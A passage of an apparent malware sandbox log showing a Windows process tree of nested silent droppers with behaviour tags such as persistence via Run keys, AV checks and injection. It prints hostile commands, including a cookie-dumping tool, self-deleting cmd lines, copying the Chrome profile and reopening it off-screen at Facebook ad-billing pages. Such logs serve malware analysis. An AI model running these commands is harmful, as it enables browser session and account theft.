"C:\Users\Admin\AppData\Local\Temp\RHDD1JFYQJ\setups.exe" ll
28⤵
PID:5560

C:\Users\Admin\AppData\Local\Temp\is-25L72.tmp\setups.tmp
"C:\Users\Admin\AppData\Local\Temp\is-25L72.tmp\setups.tmp" /SL5="$901E0,549376,61440,C:\Users\Admin\AppData\Local\Temp\RHDD1JFYQJ\setups.exe" ll
29⤵
- Checks computer location settings
- Loads dropped DLL
PID:5932

C:\Users\Admin\AppData\Local\Temp\ZN78VHHWTU\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\ZN78VHHWTU\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 104
28⤵
- Drops file in Windows directory
PID:17136

C:\Users\Admin\AppData\Local\Temp\ZN78VHHWTU\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\ZN78VHHWTU\multitimer.exe" 1 3.1616085598.6053825e29300 104
29⤵
- Adds Run key to start application
PID:7560

C:\Users\Admin\AppData\Local\Temp\ZN78VHHWTU\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\ZN78VHHWTU\multitimer.exe" 2 3.1616085598.6053825e29300
30⤵
- Checks for any installed AV software in registry
- Maps connected drives based on registry
- Enumerates system info in registry
PID:7872

C:\Users\Admin\AppData\Local\Temp\qownlt4d01d\AwesomePoolU1.exe
"C:\Users\Admin\AppData\Local\Temp\qownlt4d01d\AwesomePoolU1.exe"
31⤵
PID:9704

C:\Users\Admin\AppData\Local\Temp\oyfs0ofdfuf\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\oyfs0ofdfuf\Setup3310.exe" /Verysilent /subid=577
31⤵
PID:10400

C:\Users\Admin\AppData\Local\Temp\is-H96TO.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-H96TO.tmp\Setup3310.tmp" /SL5="$3053E,138429,56832,C:\Users\Admin\AppData\Local\Temp\oyfs0ofdfuf\Setup3310.exe" /Verysilent /subid=577
32⤵
- Loads dropped DLL
PID:10504

C:\Users\Admin\AppData\Local\Temp\is-95DJR.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-95DJR.tmp\Setup.exe" /Verysilent
33⤵
PID:11300

C:\Users\Admin\AppData\Local\Temp\is-FGJDV.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-FGJDV.tmp\Setup.tmp" /SL5="$405D2,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-95DJR.tmp\Setup.exe" /Verysilent
34⤵
PID:11532

C:\Users\Admin\AppData\Local\Temp\is-RHPP2.tmp\Delta.exe
"C:\Users\Admin\AppData\Local\Temp\is-RHPP2.tmp\Delta.exe" /Verysilent
35⤵
PID:4092

C:\Users\Admin\AppData\Local\Temp\is-9G5FL.tmp\Delta.tmp
"C:\Users\Admin\AppData\Local\Temp\is-9G5FL.tmp\Delta.tmp" /SL5="$503D6,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-RHPP2.tmp\Delta.exe" /Verysilent
36⤵
PID:15104

C:\Users\Admin\AppData\Local\Temp\is-4D5MD.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-4D5MD.tmp\Setup.exe" /VERYSILENT
37⤵
- Checks processor information in registry
PID:4500

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-4D5MD.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit
38⤵
PID:16688

C:\Windows\SysWOW64\taskkill.exe
taskkill /im Setup.exe /f
39⤵
- Kills process with taskkill
PID:17196

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
39⤵
- Delays execution with timeout.exe
PID:8712

C:\Users\Admin\AppData\Local\Temp\is-RHPP2.tmp\PictureLAb.exe
"C:\Users\Admin\AppData\Local\Temp\is-RHPP2.tmp\PictureLAb.exe" /Verysilent
35⤵
PID:4640

C:\Users\Admin\AppData\Local\Temp\is-MI7JA.tmp\PictureLAb.tmp
"C:\Users\Admin\AppData\Local\Temp\is-MI7JA.tmp\PictureLAb.tmp" /SL5="$603D6,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-RHPP2.tmp\PictureLAb.exe" /Verysilent
36⤵
PID:4448

C:\Users\Admin\AppData\Local\Temp\is-V205G.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-V205G.tmp\Setup.exe" /VERYSILENT
37⤵
PID:15612

C:\Users\Admin\AppData\Local\Temp\is-0AIUA.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-0AIUA.tmp\Setup.tmp" /SL5="$404DA,298214,214528,C:\Users\Admin\AppData\Local\Temp\is-V205G.tmp\Setup.exe" /VERYSILENT
38⤵
PID:15188

C:\Users\Admin\AppData\Local\Temp\is-2PHV0.tmp\HGT.exe
"C:\Users\Admin\AppData\Local\Temp\is-2PHV0.tmp\HGT.exe" /S /UID=lab214
39⤵
- Drops file in Drivers directory
PID:14396

C:\Users\Admin\AppData\Local\Temp\9a-b8143-0c5-373a4-f9643c376d451\Sidyshywyly.exe
"C:\Users\Admin\AppData\Local\Temp\9a-b8143-0c5-373a4-f9643c376d451\Sidyshywyly.exe"
40⤵
- Modifies system certificate store
PID:3444

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\iu50o31b.sr2\gaooo.exe & exit
41⤵
PID:12748

C:\Users\Admin\AppData\Local\Temp\iu50o31b.sr2\gaooo.exe
C:\Users\Admin\AppData\Local\Temp\iu50o31b.sr2\gaooo.exe
42⤵
PID:13908

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
43⤵
PID:14060

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
43⤵
PID:4528

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ko3l4zli.piu\md7_7dfj.exe & exit
41⤵
PID:10636

C:\Users\Admin\AppData\Local\Temp\ko3l4zli.piu\md7_7dfj.exe
C:\Users\Admin\AppData\Local\Temp\ko3l4zli.piu\md7_7dfj.exe
42⤵
- Checks whether UAC is enabled
PID:15444

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\he0hcrqh.gda\askinstall29.exe & exit
41⤵
PID:4900

C:\Users\Admin\AppData\Local\Temp\he0hcrqh.gda\askinstall29.exe
C:\Users\Admin\AppData\Local\Temp\he0hcrqh.gda\askinstall29.exe
42⤵
PID:6112

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
43⤵
PID:15572

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
44⤵
- Kills process with taskkill
PID:9312

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\adudw5ec.woo\customer4.exe & exit
41⤵
PID:14976

C:\Users\Admin\AppData\Local\Temp\adudw5ec.woo\customer4.exe
C:\Users\Admin\AppData\Local\Temp\adudw5ec.woo\customer4.exe
42⤵
PID:4208

C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"
43⤵
PID:15504

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\l3lviiku.1b0\HookSetp.exe & exit
41⤵
PID:10816

C:\Users\Admin\AppData\Local\Temp\l3lviiku.1b0\HookSetp.exe
C:\Users\Admin\AppData\Local\Temp\l3lviiku.1b0\HookSetp.exe
42⤵
PID:4248

C:\ProgramData\3849944.42
"C:\ProgramData\3849944.42"
43⤵
PID:7936

C:\ProgramData\2565045.28
"C:\ProgramData\2565045.28"
43⤵
- Suspicious behavior: SetClipboardViewer
PID:7932

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\q5raiiqx.tgz\GcleanerWW.exe /mixone & exit
41⤵
PID:6108

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xajv2ux1.m4n\privacytools5.exe & exit
41⤵
PID:5532

C:\Users\Admin\AppData\Local\Temp\xajv2ux1.m4n\privacytools5.exe
C:\Users\Admin\AppData\Local\Temp\xajv2ux1.m4n\privacytools5.exe
42⤵
- Suspicious use of SetThreadContext
PID:6988

C:\Users\Admin\AppData\Local\Temp\xajv2ux1.m4n\privacytools5.exe
C:\Users\Admin\AppData\Local\Temp\xajv2ux1.m4n\privacytools5.exe
43⤵
- Suspicious behavior: MapViewOfSection
PID:8660

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\go4l5vtc.1cq\setup.exe /8-2222 & exit
41⤵
- Suspicious use of SetWindowsHookEx
PID:7300

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0aw1nhzn.ljq\MultitimerFour.exe & exit
41⤵
PID:7928

C:\Users\Admin\AppData\Local\Temp\0aw1nhzn.ljq\MultitimerFour.exe
C:\Users\Admin\AppData\Local\Temp\0aw1nhzn.ljq\MultitimerFour.exe
42⤵
PID:8032

C:\Users\Admin\AppData\Local\Temp\S8C672O6LF\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\S8C672O6LF\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 104
43⤵
- Drops file in Windows directory
PID:6100

C:\Users\Admin\AppData\Local\Temp\S8C672O6LF\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\S8C672O6LF\multitimer.exe" 1 3.1616085669.605382a51bc0b 104
44⤵
- Adds Run key to start application
PID:6652

C:\Users\Admin\AppData\Local\Temp\S8C672O6LF\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\S8C672O6LF\multitimer.exe" 2 3.1616085669.605382a51bc0b
45⤵
- Checks for any installed AV software in registry
- Maps connected drives based on registry
- Enumerates system info in registry
PID:9788

C:\Users\Admin\AppData\Local\Temp\i4ajlprtypc\vict.exe
"C:\Users\Admin\AppData\Local\Temp\i4ajlprtypc\vict.exe" /VERYSILENT /id=535
46⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
PID:7048

C:\Users\Admin\AppData\Local\Temp\is-KR6HU.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-KR6HU.tmp\vict.tmp" /SL5="$40664,870426,780800,C:\Users\Admin\AppData\Local\Temp\i4ajlprtypc\vict.exe" /VERYSILENT /id=535
47⤵
PID:12284

C:\Users\Admin\AppData\Local\Temp\is-9T2MA.tmp\wimapi.exe
"C:\Users\Admin\AppData\Local\Temp\is-9T2MA.tmp\wimapi.exe" 535
48⤵
PID:12408

C:\Users\Admin\AppData\Local\Temp\zxsk3brktr0\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\zxsk3brktr0\Setup3310.exe" /Verysilent /subid=577
46⤵
PID:8196

C:\Users\Admin\AppData\Local\Temp\is-RR15I.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-RR15I.tmp\Setup3310.tmp" /SL5="$30668,138429,56832,C:\Users\Admin\AppData\Local\Temp\zxsk3brktr0\Setup3310.exe" /Verysilent /subid=577
47⤵
PID:13160

C:\Users\Admin\AppData\Local\Temp\is-1TBN7.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-1TBN7.tmp\Setup.exe" /Verysilent
48⤵
PID:13984

C:\Users\Admin\AppData\Local\Temp\is-KAQ55.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-KAQ55.tmp\Setup.tmp" /SL5="$6064E,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-1TBN7.tmp\Setup.exe" /Verysilent
49⤵
PID:14880

C:\Users\Admin\AppData\Local\Temp\is-Q656S.tmp\Delta.exe
"C:\Users\Admin\AppData\Local\Temp\is-Q656S.tmp\Delta.exe" /Verysilent
50⤵
PID:6048

C:\Users\Admin\AppData\Local\Temp\is-UUHK6.tmp\Delta.tmp
"C:\Users\Admin\AppData\Local\Temp\is-UUHK6.tmp\Delta.tmp" /SL5="$406F4,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-Q656S.tmp\Delta.exe" /Verysilent
51⤵
PID:4804

C:\Users\Admin\AppData\Local\Temp\is-KK9PM.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-KK9PM.tmp\Setup.exe" /VERYSILENT
52⤵
- Checks processor information in registry
PID:17228

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-KK9PM.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit
53⤵
PID:9504

C:\Windows\SysWOW64\taskkill.exe
taskkill /im Setup.exe /f
54⤵
- Kills process with taskkill
PID:13440

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
54⤵
- Delays execution with timeout.exe
PID:14128

C:\Users\Admin\AppData\Local\Temp\is-Q656S.tmp\PictureLAb.exe
"C:\Users\Admin\AppData\Local\Temp\is-Q656S.tmp\PictureLAb.exe" /Verysilent
50⤵
PID:4536

C:\Users\Admin\AppData\Local\Temp\is-7EKUP.tmp\PictureLAb.tmp
"C:\Users\Admin\AppData\Local\Temp\is-7EKUP.tmp\PictureLAb.tmp" /SL5="$506F4,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-Q656S.tmp\PictureLAb.exe" /Verysilent
51⤵
PID:15276

C:\Users\Admin\AppData\Local\Temp\is-6C66I.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-6C66I.tmp\Setup.exe" /VERYSILENT
52⤵
PID:8680

C:\Users\Admin\AppData\Local\Temp\is-2R361.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-2R361.tmp\Setup.tmp" /SL5="$307DC,298214,214528,C:\Users\Admin\AppData\Local\Temp\is-6C66I.tmp\Setup.exe" /VERYSILENT
53⤵
PID:8492

C:\Users\Admin\AppData\Local\Temp\is-HMG9P.tmp\HGT.exe
"C:\Users\Admin\AppData\Local\Temp\is-HMG9P.tmp\HGT.exe" /S /UID=lab214
54⤵
PID:8060

C:\Users\Admin\AppData\Local\Temp\cc-360d1-383-04e9d-a5d3cb3afab6c\Tukisaesyfu.exe
"C:\Users\Admin\AppData\Local\Temp\cc-360d1-383-04e9d-a5d3cb3afab6c\Tukisaesyfu.exe"
55⤵
PID:1940

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wsum0afv.hg2\gaooo.exe & exit
56⤵
PID:9528

C:\Users\Admin\AppData\Local\Temp\wsum0afv.hg2\gaooo.exe
C:\Users\Admin\AppData\Local\Temp\wsum0afv.hg2\gaooo.exe
57⤵
PID:15552

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
58⤵
PID:15668

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
58⤵
PID:14932

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\larumvqj.3eb\md7_7dfj.exe & exit
56⤵
PID:11464

C:\Users\Admin\AppData\Local\Temp\larumvqj.3eb\md7_7dfj.exe
C:\Users\Admin\AppData\Local\Temp\larumvqj.3eb\md7_7dfj.exe
57⤵
- Checks whether UAC is enabled
PID:11340

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ampits34.kbd\askinstall29.exe & exit
56⤵
PID:11752

C:\Users\Admin\AppData\Local\Temp\ampits34.kbd\askinstall29.exe
C:\Users\Admin\AppData\Local\Temp\ampits34.kbd\askinstall29.exe
57⤵
PID:2528

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
58⤵
PID:13472

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
59⤵
- Kills process with taskkill
PID:3472

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\umappuaj.g22\customer4.exe & exit
56⤵
PID:13288

C:\Users\Admin\AppData\Local\Temp\umappuaj.g22\customer4.exe
C:\Users\Admin\AppData\Local\Temp\umappuaj.g22\customer4.exe
57⤵
PID:4340

C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"
58⤵
PID:14156

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vjzwfvfs.ea5\HookSetp.exe & exit
56⤵
PID:14284

C:\Users\Admin\AppData\Local\Temp\vjzwfvfs.ea5\HookSetp.exe
C:\Users\Admin\AppData\Local\Temp\vjzwfvfs.ea5\HookSetp.exe
57⤵
PID:6836

C:\ProgramData\4630870.50
"C:\ProgramData\4630870.50"
58⤵
PID:15364

C:\ProgramData\4111450.45
"C:\ProgramData\4111450.45"
58⤵
- Suspicious behavior: SetClipboardViewer
PID:7488

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5gbqbhrd.xkj\GcleanerWW.exe /mixone & exit
56⤵
PID:11436

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\no3ghqvw.32r\privacytools5.exe & exit
56⤵
PID:2408

C:\Users\Admin\AppData\Local\Temp\no3ghqvw.32r\privacytools5.exe
C:\Users\Admin\AppData\Local\Temp\no3ghqvw.32r\privacytools5.exe
57⤵
- Suspicious use of SetThreadContext
PID:13728

C:\Users\Admin\AppData\Local\Temp\no3ghqvw.32r\privacytools5.exe
C:\Users\Admin\AppData\Local\Temp\no3ghqvw.32r\privacytools5.exe
58⤵
- Checks SCSI registry key(s)
PID:4704

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4mtucpx2.44v\setup.exe /8-2222 & exit
56⤵
- Suspicious use of SetWindowsHookEx
PID:12856

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vhwkeev0.dks\MultitimerFour.exe & exit
56⤵
PID:13664

C:\Users\Admin\AppData\Local\Temp\vhwkeev0.dks\MultitimerFour.exe
C:\Users\Admin\AppData\Local\Temp\vhwkeev0.dks\MultitimerFour.exe
57⤵
PID:8520

C:\Users\Admin\AppData\Local\Temp\TL86OE6QBX\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\TL86OE6QBX\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 104
58⤵
- Drops file in Windows directory
PID:10500

C:\Users\Admin\AppData\Local\Temp\TL86OE6QBX\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\TL86OE6QBX\multitimer.exe" 1 3.1616085799.60538327b0368 104
59⤵
- Adds Run key to start application
PID:17244

C:\Users\Admin\AppData\Local\Temp\TL86OE6QBX\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\TL86OE6QBX\multitimer.exe" 2 3.1616085799.60538327b0368
60⤵
- Checks for any installed AV software in registry
- Maps connected drives based on registry
- Enumerates system info in registry
PID:8124

C:\Users\Admin\AppData\Local\Temp\s5m11lj4pau\AwesomePoolU1.exe
"C:\Users\Admin\AppData\Local\Temp\s5m11lj4pau\AwesomePoolU1.exe"
61⤵
PID:1548

C:\Users\Admin\AppData\Local\Temp\fy4ywv0a5kk\vict.exe
"C:\Users\Admin\AppData\Local\Temp\fy4ywv0a5kk\vict.exe" /VERYSILENT /id=535
61⤵
PID:7500

C:\Users\Admin\AppData\Local\Temp\is-3D2CO.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-3D2CO.tmp\vict.tmp" /SL5="$508AC,870426,780800,C:\Users\Admin\AppData\Local\Temp\fy4ywv0a5kk\vict.exe" /VERYSILENT /id=535
62⤵
PID:11760

C:\Users\Admin\AppData\Local\Temp\is-92R6R.tmp\wimapi.exe
"C:\Users\Admin\AppData\Local\Temp\is-92R6R.tmp\wimapi.exe" 535
63⤵
PID:11936

C:\Users\Admin\AppData\Local\Temp\awnddwyz351\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\awnddwyz351\Setup3310.exe" /Verysilent /subid=577
61⤵
PID:7716

C:\Users\Admin\AppData\Local\Temp\is-ALNGO.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-ALNGO.tmp\Setup3310.tmp" /SL5="$804E4,138429,56832,C:\Users\Admin\AppData\Local\Temp\awnddwyz351\Setup3310.exe" /Verysilent /subid=577
62⤵
PID:11212

C:\Users\Admin\AppData\Local\Temp\is-2G0EP.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-2G0EP.tmp\Setup.exe" /Verysilent
63⤵
PID:11476

C:\Users\Admin\AppData\Local\Temp\is-BH2Q0.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-BH2Q0.tmp\Setup.tmp" /SL5="$905BE,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-2G0EP.tmp\Setup.exe" /Verysilent
64⤵
PID:17056

C:\Users\Admin\AppData\Local\Temp\is-E6KIN.tmp\Delta.exe
"C:\Users\Admin\AppData\Local\Temp\is-E6KIN.tmp\Delta.exe" /Verysilent
65⤵
PID:13456

C:\Users\Admin\AppData\Local\Temp\is-RD4J1.tmp\Delta.tmp
"C:\Users\Admin\AppData\Local\Temp\is-RD4J1.tmp\Delta.tmp" /SL5="$508C6,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-E6KIN.tmp\Delta.exe" /Verysilent
66⤵
PID:13196

C:\Users\Admin\AppData\Local\Temp\is-QALQQ.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-QALQQ.tmp\Setup.exe" /VERYSILENT
67⤵
- Checks processor information in registry
PID:10692

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-QALQQ.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit
68⤵
PID:10420

C:\Windows\SysWOW64\taskkill.exe
taskkill /im Setup.exe /f
69⤵
- Kills process with taskkill
PID:13356

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
69⤵
- Delays execution with timeout.exe
PID:8744

C:\Users\Admin\AppData\Local\Temp\is-E6KIN.tmp\PictureLAb.exe
"C:\Users\Admin\AppData\Local\Temp\is-E6KIN.tmp\PictureLAb.exe" /Verysilent
65⤵
PID:7344

C:\Users\Admin\AppData\Local\Temp\is-A8SF6.tmp\PictureLAb.tmp
"C:\Users\Admin\AppData\Local\Temp\is-A8SF6.tmp\PictureLAb.tmp" /SL5="$608C6,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-E6KIN.tmp\PictureLAb.exe" /Verysilent
66⤵
PID:7948

C:\Users\Admin\AppData\Local\Temp\is-MGLI9.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-MGLI9.tmp\Setup.exe" /VERYSILENT
67⤵
PID:7240

C:\Users\Admin\AppData\Local\Temp\is-G5BP4.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-G5BP4.tmp\Setup.tmp" /SL5="$70610,298214,214528,C:\Users\Admin\AppData\Local\Temp\is-MGLI9.tmp\Setup.exe" /VERYSILENT
68⤵
PID:10456

C:\Users\Admin\AppData\Local\Temp\is-V0OSS.tmp\HGT.exe
"C:\Users\Admin\AppData\Local\Temp\is-V0OSS.tmp\HGT.exe" /S /UID=lab214
69⤵
- Drops file in Drivers directory
PID:12420

C:\Users\Admin\AppData\Local\Temp\bf-d0835-7a5-3ddac-841d4fa145976\Haexaxojesha.exe
"C:\Users\Admin\AppData\Local\Temp\bf-d0835-7a5-3ddac-841d4fa145976\Haexaxojesha.exe"
70⤵
PID:16812

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5geiscc2.u1c\gaooo.exe & exit
71⤵
PID:12884

C:\Users\Admin\AppData\Local\Temp\5geiscc2.u1c\gaooo.exe
C:\Users\Admin\AppData\Local\Temp\5geiscc2.u1c\gaooo.exe
72⤵
PID:13576

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
73⤵
PID:5604

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
73⤵
PID:16300

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\d1abrwur.kjm\md7_7dfj.exe & exit
71⤵
PID:13564

C:\Users\Admin\AppData\Local\Temp\d1abrwur.kjm\md7_7dfj.exe
C:\Users\Admin\AppData\Local\Temp\d1abrwur.kjm\md7_7dfj.exe
72⤵
- Checks whether UAC is enabled
PID:5948

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zmzqpbtc.i3d\askinstall29.exe & exit
71⤵
- Checks computer location settings
- Modifies registry class
PID:16852

C:\Users\Admin\AppData\Local\Temp\zmzqpbtc.i3d\askinstall29.exe
C:\Users\Admin\AppData\Local\Temp\zmzqpbtc.i3d\askinstall29.exe
72⤵
- Drops Chrome extension
PID:15300

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
73⤵
PID:15848

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
74⤵
- Kills process with taskkill
PID:6984

C:\Windows\SysWOW64\xcopy.exe
xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y
73⤵
- Enumerates system info in registry
PID:5640

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
73⤵
PID:12108

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ffc43f36e00,0x7ffc43f36e10,0x7ffc43f36e20
74⤵
PID:13592

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1608,1329164455694045133,11970494685335120572,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2172 /prefetch:8
74⤵
PID:6896

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1608,1329164455694045133,11970494685335120572,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1668 /prefetch:8
74⤵
PID:10724

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1608,1329164455694045133,11970494685335120572,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1620 /prefetch:2
74⤵
PID:12256

C:\Program Files\Google\Chrome\Application\chrome.exe
